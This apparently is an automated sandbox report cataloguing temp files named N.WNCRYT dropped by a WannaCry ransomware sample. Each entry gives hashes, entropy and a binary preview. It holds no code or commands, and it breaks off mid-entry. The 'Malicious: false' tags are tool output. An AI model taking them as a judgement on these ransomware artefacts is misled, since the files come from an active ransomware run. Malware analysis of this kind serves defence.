Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.803894862328294
Encrypted:	false
SSDEEP:	24:C1dmMfFjpLLl7WnA2WxS0FIMz3heM7muofmq:CeMfFjxp7W/WxS0FPeTP
MD5:	7B034E6020CB5CF4A793C60CF971FE19
SHA1:	FD7B980A7EDE1CB70D9979EC7CD48A43EA5B5472
SHA-256:	13B76CC1BB8811E08C5DD778EC08CC07E9E69C7260D1D0A0F4B50C7882AD8341
SHA-512:	75E10297E22126CEA4F58CCDE611F7D82A2C0759CB5307D84118A18A61B9967118EE628D70B2A0B811E69F179281939F77F98668E06FF8D309488CEB29A43C55
Malicious:	false
Reputation:	unknown
Preview:	t.,S....F)(.ru.b...F.y.....=..z:..t.._....x....o.....#.r.7l....O...J......(.OQ......}z..h.s..Q...BGg3;..ftg5..y")jhbTtP.;$......1>.=.p.#./.G..m..f..D........jT...15....../.)...d...j.i.. O....)...{....+....Ww.b....<\4....\..C!..2..u.6.....m.. .M+..dx....z^..4....f....r...".`w.%.....NbD...r+..lJ.........oK..y..y.:z..(......f..A......t+T\...7.........7..yM!g.\|........H..b$.uPCT.J...@\..Ob.K;_...pL.J7O........]Z\x..i.$".1..)..N.1$\|....j...b...P...x..J,...c5.;.Xg...iV..^..W(vA_...)(E.....Z.......{;.Ml...d.aT...Pa.....D......i.B..M..R.V...o.....dY............A\..t......U.-.....[. ...7R\..O\q.P..e.s.......>i..a.8zm..zZy.h.8...`.YS..+P.........r..?..\|....L...3....R.......{A..p(.$.Z$d.^.P.k. ...0..+.....5..8../cD.c>b)S.<..~.c......G..n......Zf......9.'.`S.?..n.w..w...^W...9.0o.zl.m3.y.,....5..ky...d.9..e.....6Df....F...N..../..f.... &..B."...Pu.t..o.j.o.T?.2U.../@D..k.i,......_.n\!W.Py....9k.Pm..s.9..`..Ta..... .b.q(..#i~..r..Z.Db.j

C:\Users\user\AppData\Local\Temp\33.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.819291361679207
Encrypted:	false
SSDEEP:	24:CmD6Hds+5AdDykd3vMBQ6aJTTGM5yfmXErqvfDGVaT0qXShlrEGbo:vDD1/oaJTTGMFiOfDGVEKDrg
MD5:	797710A6419335C389DED0AE6A569B28
SHA1:	1106D32D7E4BDAC30FCFE1CB3432059EBEB00E58
SHA-256:	10D87C6571A9EEBB731557C8EA68210FB12A0C5F057259C09D5758E56E40ED73
SHA-512:	C01AF3EB8D0A0E0DA40BBF40A7D9FEABF1B45B5E103E4875A649B17185EAFE68D021C3ED68E8F9B85FEAD4CCE462DE4CA826EFFE4428B3387CB18994689F4B12
Malicious:	false
Reputation:	unknown
Preview:	...J.....P..c/....c.@.U..N......_.t7.A.......A.;G3.a.1..5.......;....P=.H...0..).+%.f..P{..KaZ%.J,f.3..qa7...dX...)..b.w.8.].&.(...v9..V^F....n.[U.oOW..!E$wY]<GoA...qSa..q...BN..i._.i(w...w.[Z8r.R..},......U@....e"...:.!....75N4..}........U..US6........>],,..B.8...$.t....~UG. ..R.F5.#.T...f.K_?..{k...X,.f.]b...p&....{......p8.a....g...$c0.....>.;N.<.[Hw....#.$20...+s..z..#..+.>.Ne.!.<.Fn..ZG5.D!...qwG^.uw....%].=k.VTV..&.8..{z...'.....z.7.(./.N.5q.......uBVv.3O..%.%wA$]8...4..e...'.._...,n.{._A.a#NUr.\[.:7.Y..-...q.M...~e..k.5.0J.._./ K..M...YX...t.3S.v...DX...a..Hi..S>..39.6Zvj....Y.)..z.sQ.........Pg.gx....hR..sN.y..Y..)........w..%MgQ...C....&.O.X.........>=..\|M.jh.\....BW1.......w..!.......+4>..(.H.....9a.}...6.e$((....x...i9.....[f..B..&UQz.........k..Q..I....1...:a..G...O..x..6.4...W.R.B...f.W[ .io.+D.Z. .......V.....+.>....d7y..6.S.q..&.........\%.".N.Em.G$..../.:.pdah.n'.p.a.b.}.~.k.].5Y._b..G:3X#8."...:.....7zMd..##`F.$'...8..l..

C:\Users\user\AppData\Local\Temp\34.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.802117767651323
Encrypted:	false
SSDEEP:	24:LIg0+9vjLfwF4oEBkOZS83yVqIoC0N6MD0Svh2siGpkjyKXLos1:LIg0ojE81Vy4Itz22siiW51
MD5:	5D2E37399753AF3E4CF6C64A47ACF5D2
SHA1:	DE9D1362B9BDFF00EB2DD66A8B276575A1C2114D
SHA-256:	66B7BF5A00F6A6DB6BBA6218CF5F9698C32AF0545636BBE3519E6A8D927B00C8
SHA-512:	E4BE6255E44F75833EA94104D3C9D80875DC16CDB756550C1DA7C4CF139A7CFCFFA2EFA456C0899E5404E8798D069937CA880FAEE0A738A2DA11DF708C6EE9EF
Malicious:	false
Reputation:	unknown
Preview:	...WY..M._..%@M..o.2...)..:...g..M.sl@.3.0...."...o7.S.4p.`..J1L..d@H.f..W.e..w...w..M.~~.?.D..........D........,sQ.HB.Bd...z....xU...n.>?..7......./\|-..)0.0J..'....A2....@I.<uS ...N.=.ml.[.i.....O.!...QCll....X...\|...&"%....K"o\..s............MUb..{o70/.F<...X..m.XPO....1@...~...<...Wa)...Ka^[#I.}}...T.!.u..$..ToT.....#.X.~.$.(....)..........0....&.b.{.A......$%.Y.Y..>6.`Q.3p.B.-.xM..;M}.qF%.(...,......V.5M.c-s#.U....^.:8...P.......v.)xq..l.....w...1.P..k..d...F.K....2...x..`>48..W.A<6..j.n..k5.e].....v.{....q.P..u.......&......o9...8O.V....,.w_8.GB>.....0...Y....6...7iC..k8.%.....)#...%.@....MYw.qF ....\.._..{...PQ;....^.X..j.%. ..l....`..'...eF.....UZj....ah...z=..E..u...4.$.Vd.?.r6c.8sp.b..JL....B'...5a.....#.J.....N..(W../......_3....cW?;.t#.....t0`...^..".=..V...8....q.nHB2...z...S.r...$.. .....M.kV..%..E,.?...r.....c"*3....C<.......\|mS.....x...G."S... .4P.b6.0.eY..4...T.lc../..+......]$.y.....n..L.....!g.....@.j...3..S..}.......A

C:\Users\user\AppData\Local\Temp\35.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.801825763352753
Encrypted:	false
SSDEEP:	24:2bjOuaogdZOVvv2+hAnGNjj/8lBEjn95GdqDZR32Q5:4jOOhvhA0/8Cn9AKZF2Q5
MD5:	CA5A92D8F512D0BF4D8C4B20A61C11C0
SHA1:	473D45A4BF9EF0EAE2CE47833EC9ADF701998B6E
SHA-256:	C8432CA839CE2016112A982C2E1F3C18489AD49FBF044F384BDEA2B7166EFC08
SHA-512:	35E8E3C50CD666BBAE6ADEAD2B1CE0846DDF6F6B571EACFA0C5DAB4E580C7A0FBD3EF9940A647C3854E9312799762F6EBCBE43D43DD67BF2C8C28F9BEC9AD213
Malicious:	false
Reputation:	unknown
Preview:	.....o.v...&K.:9.E}.(.w.......i4.z.y.a......J.DJ.r...l..@..A3."W.iQ..s\K0'3F.]u..:....E...!eqR..."KP..is9..g..n.D..I.a.......]. ...G.-. Ez...n.%.0..J(..#$.r.%.~6.n.c9j..).u...]...........jR..e.X....j..a....jO...R..y.X...`. .........a.?..J..,.i...a..t{.5!....-g.^...j.R.p.....mnt ......T%..2..Bv..".Ts&...A.......!.F...[c.?;[O......v.(.=.,w#V....\|..Q..B...0.&.b.OYt..9s....0...-......b.N.z...u.}.j....j..,.dYLG...q/...6X .P...E..%...&._..-.....X........k..c..BQ.K.....k.{.,.@}N.np...Q.5#.C....!..'.9C......,....&q.F.6..#n..-.y....Ob./.ju{.O..Qh..'^i:....mI..V}...'...'.2..G..>...6(\.....l...&...T...Q(.5...Ebo.........C...^.2.....<....L.A..L.gA{`L.....C.D.qa^/..]~.;-/...Ek..B.i3....yL..8.._.>4]/...LT.l.).Y)..W..PK.yA....{!epP,.-X.=. ..2...Il.6....K\+.T&%.T;v.........s.;/!.O.m".N.S...h.u..iS.9...!.n....c+.9.kj.D..f5S.a....f.......)x.b..a.Gb.4...bY..>.Hi.a..!.k,.^.dr..._.,S).Y...U...]J0.].x.&t....".....h..A..l..2.%@x.Mas.<'.)<.Lsn..q..5.!......]..

C:\Users\user\AppData\Local\Temp\36.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.782468176501425
Encrypted:	false
SSDEEP:	24:VjiIJJuhwSfutJZ7kJ8ckQ8oxC3abSg/TfuJtp5:gMuhwzHm3kQ8oxeaW2uJh
MD5:	D21BCCFB2B725704351148F486204B86
SHA1:	321F877BA21F9837A457A1474D58B0C6581F9F89
SHA-256:	39BC860D6EA05E248EB463FC87719AD58ECDBA575C539909E6A47D5B8E685C05
SHA-512:	8D5471DE1A20A30F372BDD64E9F6ED74A4DB7898DBC832178ABF86BD006F451E803E1EF2147A8321D65FA97D0232BC96DDAE368F1E8A29CD41C9648BDAD98D91
Malicious:	false
Reputation:	unknown
Preview:	l.sd....i..N.e.`.Ud...d{.rxj...^.R..@. .b.i.n...2:../ZRI..........Xv..4Oc...@SQ.(..y.Y<...h....N..)8Q...-.+r.CB.r..k..\|.......#..YT..'.L..i.6..Y......NW../..z.K...O.4..+..-.Yso..X.....ZV.....7...F]....<...3 &..C....y..d&&fq.]./.oY....#6,niL..5..@...c...p..I.<j.......Q.(m.;..........x....aM<2.Wc...d...s:.h%.K%.......;...I. .S..<R..w..+#2mg$.........1.....g\|.F+...J_..t.....u......^>C`....]_.........`......o4........#.........{....Lw........=.u/.v..X...Rd.\|.....G.v.:./i..s..=....w.Q......V7&.}(..]UE...@.y....Y.n?.."....m.`....C.R...S.....L6......i.jr....q7..%....,...S....!...Tu.......{....$i....nk..i....?D..Xf......9..<....[..=..IY./9p..&.ck....u........z.'dvO...Q...x..$US-%...9..G..I%..U....}1,Y.+.0m.pYM....S..s..k.=].R{..o=zfy..vw...&.".....U..UR.t......'x.....}....].l.3S.K...x..R.hx....s.l..q...h"+......."..A.2@:Fw.,.`. 6..>...^jBx.f..d......O...-.Y.._...N....hJ........E...9......8.......Z=r..3\!.2CL.~.T.)....&F'...a..../....`1...;8Y.

C:\Users\user\AppData\Local\Temp\37.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.8148380862196225
Encrypted:	false
SSDEEP:	24:aAwVVoRr/5lRWKdL/3QppPEyQU4rA4wUdOn6YQCY8P:fwVVMr/rRZifQU4c4wsYP
MD5:	A8D0B8419800CAFFF650B7FACA43AB1B
SHA1:	BADDA0774D2DFC8C484FB801ABF4C3FE918C3DBD
SHA-256:	6F200BC7AD6873E36BDA41AF0918B9A92D81F2C876D7E3E152EBBFC8329BD3B4
SHA-512:	0E0C2467E3506AB3D9B50A40E3264EA48C754F0FA1B94112C0D37AACA1C022D9B41265DD2DF721C67D52699368DD99AF9C4FB88C516E0660A78D497773335D45
Malicious:	false
Reputation:	unknown
Preview:	......5#$2.fO....b5.U=.._u....>-....t.....?.......w.v...<.=...D.tN.(s...Q....+...Q6.^ .}C.a.e....\|.+.5....fJ....'....J..}n.e.&.+.M&qZ.$..,.....$...d.c.A..F.O\|...4.5.....-8......]2......z......;...5+..KG_.\|#U/.n..4re.Q..T.........\{.P.M$.S..Hdt~....L.c....N....B4,..t...:.ch.ls....:.."\.MF0P,.......lZ..@.nC.w."".7r.d.S.....z......I.a.t....7.\$6.)..#@.R...q.i....W....j]....c8..#..C...cnezi...B.D..g..s.L.be..M.`...f.......y...g.1&}.....6wI9..8y...P.[.3...;....kG.k..N.k...T...L..`..W..!'%..}/G..Z..Yf.....r.....A..K.S....#......H...T).-..+.....2..W._.J..G.N.....[ .......\|2T......~.'.....2.)o!rB..!\.......d,...#..........Kzsfr..#r...#.~.KU......=.......Y.L.j....[..?.A.a..}K.....?Ac.?..mZ....P...w%RxRA'.0..g-..v..%.a/&Xm.98..X..%....4,R....t2.....U...9...Fu.6.W....(N....94H..1...p.U....'mZ..Cq...S.j*F...<e....y./.a...0.Lv.w..6.e.A[..R.d.\|M?T...n...M..U....m.w1.........f)V.V...q$.B&T...kK..R..\|...u..P..).?f.[>.5.S.S...N.m..&...9....2.R.P..&_..0..3....

C:\Users\user\AppData\Local\Temp\38.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.809853930949499
Encrypted:	false
SSDEEP:	24:vTR9bBp4EPPvrlvdw/QyGYoyqTaNZlkP4IgV0kcJvPh6H:v/j/rlU9GYxNPdqkonhE
MD5:	4A15D3B300F8AD1C32A6F099D48AFBFA
SHA1:	1BEA3D93D621CBF72CA2B6FCC1DC56EDC17749A2
SHA-256:	E9FDEE47BBB996E6B261CE451B82976A9C421238D4BAA034CA3DAC25593EE41B
SHA-512:	8F594A35FF775B72F7C3C48B878D0A2374E090FE41AB644E66B9CDFA2C19282179F373A3A45E59ABD16C0C445EF14CBBA3A17EA272B78A81175ECB5ECDFEBA26
Malicious:	false
Reputation:	unknown
Preview:	-....]....O...oz.ZA...wrl"!.\...y.v..@....M.....<3\|.=......O....,..N..'.... ^}..r.(....V:.-a..g.g...n.....p.v...:...wB~j.\a.H.Hz.2lGpc.4c.k...2.. ..=.b/.g.......%....- ...g~.Z...}...U.>`Mr....Q7.....P$..Q.N.E........@.z.bi2..%....(D}vS[.`.v.(q5p..?<.o....%G.._..6i`,.c..2.v..!.^...k.........O.... .c.G.o...Z..T.A..Y/~[.....w4..\.t.0zk..Q5.............o.E...)Gs..-.4.N.l.$L.e..5..:....,...c...y.]......Pp".v...=(2~.`.....1.+..V....:.<f........D].I=,!)J.4.......2..$;......+..tt......TI2odV6..=,<Kd...HYJ..].\l...aX..M.M..?....../.+...t.I6.-.y.....<}.pd=.....s..&..<.....h...U.{X......N).].A....p...H.............E.#?.x..'\|u.;..e6/.0.... ......3...39or.0...cmv#-....W..`...d.IW..R,....7....t.E...Q3.Z.......3v.1.s3...\...g`F.-.....{._.R.$bU..3a...}.O..J.....)....N...6.o....t.N[.a.).....{,.u....\K.O5.Y.V".....{o..@.!.g.}.1...<VC......a;.a..:O0^.\|.PM}:..P.X..g.'..H5.{....8f.....$...z...Gq..P)..&_..f.68..{.&..<....^X[u2\..KPeN.....j).@9....oY(&...

C:\Users\user\AppData\Local\Temp\39.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.842730061655697
Encrypted:	false
SSDEEP:	24:tyOw+ZwqRnbTfGiuaOwMU5gYw1T1bVpQcBrqc0/t75:UP1q13GiXMggYw51tqckN
MD5:	8C7E70086351732E2D158EA96F73256F
SHA1:	A28C095445E0FBC276ED16B7510262489DF76FC7
SHA-256:	9CA329644117DC13B12BA65DCA6B7B10E20735BD545F187B2B70D6F89E3F740B
SHA-512:	8483A484C2F988DED2219C9FB8F5B3C49BDDDA618AA52B3D833E6B482AF6D07BEE0CCBDAE1FB5E9467387015355DD7FD3314050F7C14477AEB0A3FA0EC504C12
Malicious:	false
Reputation:	unknown
Preview:	..L........iY.s.t.......IB..w..4...Y.Y..t.3.%.tM.[g.GC.~+8.......O&;.JQ0..\.D...F.\D......Z..ES...ibn.D`$.K...s.[....N$....;.5..S zT.....cF..i..X.{U.Cq..y<..a.R..t.".Oe...l.o2...I..w...!...((S&^.Q../........-.....YL3.B.f.\M.....z._~_.Ee.......+..&.3lw..3".&..wW`V...U..$...<.&...20q.L.r.g3..x.q......u..h.~.q...tg..J...k.Y../.A.p...`.x...=....9.(.........z,]....\..$...q..b.^..^.....R....m.H..-...\|48....3y.-.M...h...lA.>..7.x]..c...`..&....,.W$..O..x..,.=D....@.lX....%.?#.\...."..H.o.....I...U!..!.....p....8Rji.+.:~D..K.fr....2.\e.........o..a/.(.......w.1@.....Sc..v?........K.B.R....H6C.e.gw}..zz]KM.r7.[.N.G.@.H.2..%.S.D.x.$\.+...\|.....)..Z.;7.,e...D.....^m...%E%......CD8b[...E ...y.fE.c..-.'.?>i3N..G..M...v.;....~.f....H1.}...XE?.......:..j).....tG......G.......M.-......:.*.../NJ.7-...%..k...z..G..A....1.@.#..j.....V....pO..@...O.gL..o.;.......C.J_....a.x....`&243l...JM..L.h.....dU;.Z.S...;..#......[P.qD...

C:\Users\user\AppData\Local\Temp\4.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.801204761909629
Encrypted:	false
SSDEEP:	24:23tbtGZsSXYSfB1E404fgU8xUTOyqNZ1cR6jVk:kAsSIAB1EIfNdOj+Ck
MD5:	72EC6A04100027C0035995D660A56386
SHA1:	C6BF69E2FDF68E43BEE37ED9B3719C6C61DFB55B
SHA-256:	3B5F759D3A5A6DEE44237B0248FF75500905471FDD5B18C41430F98A17D062C0
SHA-512:	9F18ED83BF0F24D96B54E77A36AA8A4CC7D454981BB23FA3E7C3AFB0127EB95550F04130397A2D94E6EFBEDCD31331C2288D4602E97784D2F6C25E1800CDB63E
Malicious:	false
Reputation:	unknown
Preview:	...........'....Kue&..<..%.....2........M....K.N...x7.B.G^.F.1I..n.[.e....-.e.Y.B..../.2.GD...q3....o.I...A...^p#..].}.(uw9e.Fx.O.+..`.....D......3.S.o..:.^.OT..3.......Q..p...)m.ZB.Z.2d.RA....!..k...k.U.20.c...>nk.3Xw.>.P &eYP......U.Y..&:..n...D...m(LS3....r[.6(.n.....I....P..@..9:z.6..n....4]p.N.....`..PW../."sP.\|.`.....R......{.a..6z.K.w..W0......b&....H@LbV....}7..O 81.....)...!J#....._.q.mJ#.JSC.....+8.D.........F....{..$.2...?Q..(..ht...eZM.. ).$..4.'......7..~.8....O../...,a..i....p..qC.u.<.\|...3....C,lit........h.x.i9.,9v...I....O...+.. .:c ..P6..,.....a..s...7oB.........?Z.N..M..P..9.,.Y.).`..J....2..p...12z o.\|..7....0...........Op{A.M...r.#..Z.xo....0J.s.JS..Z`.]:...F....e..R.A.f.6.\|eo....K.z=7w.L.Zw..z]Y......P..........b.].._..r...Lb.2.47._..9rI0<....87.....\|o..C)...."...'w.W:.:.....N....v.V.9.Z#........Q..=..".+\|4.PA7U*R.G ..v..g0.j\.`H.....Jy.G..j..s...}...M.LWV.Tk.@y.n.$..o.....F..@..............5.^$;)....u.R...`v...z....W

C:\Users\user\AppData\Local\Temp\40.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.802375723310667
Encrypted:	false
SSDEEP:	24:dkBHntMLWHwXa2Ne9m8PLMj6TD2aZ6h0ja+8HlZ:doNMLWHGa2gNjMW/7664FZ
MD5:	7F5AEA118984351DF4A7EAF257A793B1
SHA1:	1FA75723E296DE3B57ABC6536855AF0237BFBC33
SHA-256:	5F5B1B2AD7AB91E72106883A123A3D11D6DF5103597DAD75EE248809C13F5331
SHA-512:	860A59106C7E49621AC4E60E91959538A16FCBB615285C5A5AEED3F7EAFE61419B06EC12044F70BA27CF37EB4D60E90B87F229B36EBE067F54EA1193ADECC419
Malicious:	false
Reputation:	unknown
Preview:	...].&:..Q0...._.i...%....N..sB.2.....+..-g@ZI......4....(.O.Y."..Y.A.#t..d`..B...H......?..:..:.....B.9...1A..#@a.\|.....O.\.....v..q+...x._.....AE.Yk....o.x.xD.7..._%.u.D{.....0.._}.J]HS..Y...1..-..cF...Z^.i. .<~......d..s....8,..+a.........U.R.'W....)...q:/.9.....r.....6.s.....s"..ni....LY@.3.7....vN=t..#..R...........~Z.. .1..z....L.}..+~..aw..i9..jaw...(......c?$l..}.O$.A..u"'..O......).......\qVf.`..z......GC./..Bxn..2.xX.9.c..T...S..o.z..+.o0<..?...x(....%/.e.?......X...$R.AB...1.XD.......#=..p.r..9...8...].x....d..+...Sf.z..."..H.5.H.5.0.1.....6..M.....Kt.A...J.R]6\...jS.i%.mK.3.....7..g.:3.(/iX.%....."....t~..~...;.n..(..,...&..8....`B.5.)j....L.+b.8..+i(..l.../.......1}...U }a...#..3;.x.o.?@.....C:.xG..&F.....P.......K..,..`..6a".e...7.......J...qn!...?/Z....-.^.,...~..u..r.....M..Z.q.........Z..$L..........Nk.~..~R..m....ub.)..a.m&....{g`..P.).>..o.F._.o.@..l.\|BO.$....h...Q..g......Y?.).#.n....c-U.0...L.R.#C...fS..W..Dh;...8.QH.

C:\Users\user\AppData\Local\Temp\41.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.826783441450989
Encrypted:	false
SSDEEP:	24:884Ro0GfFxeyfM0ysuuHYE9pfeFZ9p8VlZyEJQiukJc:8oHfyyUH8HvgZgVlMWQiukJc
MD5:	37BCA6C89D479A1B704B52D49F68BB9B
SHA1:	FB4C5FDA7785623916A7E815FB2BDAE75CEE73DD
SHA-256:	04EFCA78321605F18E7F699F76067EE385935B91B6A3DA2BB6463686E220765D
SHA-512:	4B4CAABF2F4E9A2714BC8A46EE1F182D88A6654349F5A5DF5BB1BF997DF8F3FB8035BF25CFC9B4362E8C88EF86F852734D26FDE2B849AB85291808272F7EB004
Malicious:	false
Reputation:	unknown
Preview:	>....!.........R$7..h....Hd...........E...).u..A....1f..f.Dk..8...53AN.....s..lA.E.:.E.Sh......o.1.]. ....^...[.-;..TZ.;...39.6.9.\.._+^...B....Gn[....g.pK.g.i.....M.{..?.O_....5.~.....`.......Q.D......U.A...D.....}.....7<.@.........g..f.........C.\U.op>...S.f..2!..5.8.X..).!....`.......<u.E0.9.....+p..g..0!..@s.\|...8`....7...].....F.o.^yU6\|.Y.^-.#.x.:EtkE.....z..K.....{..#.8........{...6Q..Ye$.g.j..F..P.v....7:7......k.\|P$.....d..n...,-..RS..0[E........^.aH5.^.y40.......J{4...z....G\jH...F,....~.q....k.)...OH...NO.........v.3.O....auE..f.e#.s.H.z..~..d..k...b..........N.06.M.2..S...=QrY...j.)..E"F."8.}V.;kMm.o..Nd.\|.......Cv_..3x.#.8.1...j@R.......DTG...D.&.....C.!XV!..'G..N..J>......%..,.S....(.3...../.P.._3....JP5@....Dn...k.}......rs.y...t.!...zh.....x.i.[.G ,;.QT3l......{.....V..L.(w.>.npM..x...:..+.3...C...!2;...d(.9J"......f`.(.._.h.V..E......=!.`.4XI.M.z$.#g.\|..9.:......z.....7.M..J.*qJ..X:.^..i,)..S.#>@,..v..c.22.j.].F=..Q,

C:\Users\user\AppData\Local\Temp\42.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.816776421274406
Encrypted:	false
SSDEEP:	24:O3eVaIm9sXRJ/BPN4m5CdM/RwNjkmkboyPS/di:mebb/N6m5MM/RwNlkboyPmdi
MD5:	B7B19143553AF7F178434C206D96B5DD
SHA1:	779139C3298F4806BD9058A8ED1B88D6768C7472
SHA-256:	D30811AD2726A4519C5605EF4BAC3CF2DB0251E01E6A58FF1C3237F628C53419
SHA-512:	17548A02ED4053ED0C55995DD55844650368B2E13055CFF68763110E7C5AC8BB01B2B108E3A62087C27F47F75BA6A6D70515CB1B5A2F1D5DBDEA87BDC9C2963A
Malicious:	false
Reputation:	unknown
Preview:	.<.."U.<...qb-.G@.o.o..0..?.H\3....5!.s..Uj.o.&..i9..J.v..Q.??.I.Ey.....R.s.5.".B....D.m.....c.....<........?..2..4^<..ce.q...%.R7....L....K......2r.[..K2....V........uu7v `.Y..{QS..=.~N...u."8"......]....t...).&..s...]...(...O....LhA.4 ....(...LK]....%...............F.../.H...\..g.Q....oLX.y...p.Bj5......^K..9#8`.Vp[EF\|..ha.F.i...WJ.}.....6\T.........>..Z_.'.Y...y;.=fx6[.....O...fFe.B...v.....;F...9.3.G>.:.K...M............\|.#.....C....y.=+..d.N.pz.O..">..7.'.W...L.^...........d..C.,.U6...v..H...#1.s._!...4<.:m.XK....,0u3...8...D.`...P,...`..p...\|.GXI......1"Z....g.$qVS..7..Le.s.."5.t.&Q(.y.(.J..fy......<........i.v..EM.f...$1rv.C.....>......ew.I....#....<....7s..... .Z......)..`.."<...9....6Q...1....#....b^.5. .@Pb..w~]k. .:....C.U...zk.^.t..K....)`B.S...lu.....f...J...}.4.(..Kf.Qa...QC.@....PcU..Bk+....#...R..jQ........i.>...e"L.U$..a.3...!.+...#....e...-o....d.2......zP:..l&^h.T.F.Y.....>..C.....c...tb.k\.~...k.a<

C:\Users\user\AppData\Local\Temp\43.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.796713567935763
Encrypted:	false
SSDEEP:	24:uBSDrzs6/9g55OwdSx2yrWIobkU1ZtH2koiCj/cpojVR:Y36/9uOwSnid7tCD9j
MD5:	63263CAD1E1F61C74DB8A4F6BF8A4DB6
SHA1:	CF8F812478C7B8933B529904F9333BC5CE651D2A
SHA-256:	5DD8D7319F7ECC6F44B51C4B9D41DC3C60B0AECB7D5F180F1A5A572B52B1F2AA
SHA-512:	6D7295CC346DBBE4C4FF789DB58BDF9CB8F1FABE75CFAB5CD4515AB64E7F362428F7062D6CE293D2E714335C5C9AEAFAED7250269C14B6118D67639869879745
Malicious:	false
Reputation:	unknown
Preview:	....rs..z.c..Y.r8;b..ei....^....X.\|...}....yx...Ki...X..d.9i..(.a@.yY....N...=._...>BR..n...PC}++.\.S>. ..m9.....2..0.f........8.2q....h...M.....&..H...PP....(...}........_.Q.#r-Zp.....TA._...p1.g......?..3.B....-~.m.U.u..4?.#...~.Up...G..._.....[3......i...6..'..^.$;.\.[.IV)Fwh=]L.E>u....!..37.M...q.7>w1:....MB.V....K..j...VSJ.....<..j.c.......c<d>_.......s,..0..~....?..-........#....}.....<..a...A,.....P.Q..c.`m./B.3u%...X..c..-Gz........9....L@O\|.A.<n. .\.d....KK~.%h2.H.F.3.....8....K.I....0[..OaO..j...h.....d...s)..sP....n..u...k{..0...F.'.1D..E\|f/I.@.~P...i..\|..z[9(.;M.(.N......2.J..V n.'.H..P.#c.Jc....%...J........_..\.<.5E%j......~`...+...p.I.....Q..&&4../F....Z..Xj4..H.W.C...P..0.L...c.>.:\|...fi....+...Y.!e......'..%...H .G..O..TX.......=k...S..\|...9...(..'Dq.....{.ev........r..J;...b...n'.D.p..`O.....T.....WBV.....a...pa...bW8.r.}O.a..Y.Z.g..B=/.....F..z.I...)E.B.XOc...@..yD.M.t...ZL....Q.O.].#.F.M}.yo..y...7 ......>..4...E.>G

C:\Users\user\AppData\Local\Temp\44.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.812751164747406
Encrypted:	false
SSDEEP:	24:HS7ENSlYBaK/bjvJFv2VwpyVC8b82IYgwuhm5/ZI:yINSlspjjvkw38kYg3Y/ZI
MD5:	29D8CE8BECAD79E3C47D57257142B901
SHA1:	2939B35E82AC27746F8B06BF12D09C584B0B5457
SHA-256:	CA1A804D5903DC06D10A1EA263771AA41DDAA5DC60EDC064E0300817B0FFF643
SHA-512:	02771577D4E510DBD60A607F62F1890909F08BEE49B638A4399EBC94128FE1CB17BA5B2AD334CA4B8CD0C510DB6093DD9AAEAAFB4EAC9A6586577A2280330747
Malicious:	false
Reputation:	unknown
Preview:	u.....v...=w3"..!5.>......W...V7....R.C..P<H.......}M>.X#.tr..n...=8.,~.]R..;.`..[>a...1.[..Dw7..<FP.^..(..~......$z.....(.l..C.Z..!.\..@..........1;......ra.....q...x.+.[P...K..q.D...Z[1...w$.h...b..(.k:Eu...h'.p5.I.....,&.IE.K.{...,.....h....#..8Z....E.$<........f.....C)..Y..Vh...b.cfH..{.s..$s....Lx0...x..7U.M.xUst..Dr.?\|J.....P.#. .1..@....@,.....T.O"T.Gg..e@..z...7.w.,....g..... &...D....Z~...n.........K....Jw"...V.V.vc.m>l...<._..k.......e..F2..hq.qk`+. Q....y.s.OU.....8(.)m2:....nGP._E.5.B.2.........dl....6....y5w...I...l...=p.l.-L.ih......Cf"...43K.1.r....a9..../.Y-.u..Vn.\).....4.$c../:...N...r...f..P...sW~.x.W.P(....v..B.v.J\...bi.Q...R...7-..2~a56.m.O......P..b.8.8.C.~L......C......{.......xp.....Zd.,.Tj.@..xb..C..C<P....9.W..\|}T&k....>x.bfp .u.p.ly..0..h.....nL%U-c....@,....Yg.r.'..]#..(i!...'....h.p..f\g.&.-.......z.v&..S.n....1..U...S.B....V..w...............j..X...%rd}.W.zm.Q.-....._'#R..n...,.e.....6...%.xM..5/..b...Z.N.*N.

C:\Users\user\AppData\Local\Temp\45.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.833192084028641
Encrypted:	false
SSDEEP:	24:9oz7pLFVYs/7civ2cjruHWbC8EUQex9grhqXY4Wxsoq2Hl:9O7BjOi6HYyU5x9grh1pxsKF
MD5:	49DFFC3B211F931C50BF635A9213C828
SHA1:	9A0ECDC1CF05DF66FF2B91E348393BCC9380D12E
SHA-256:	20B9DB40086587127333F5EE3A799D6A8263EB085F9DE168A6C16D88F7CE83F0
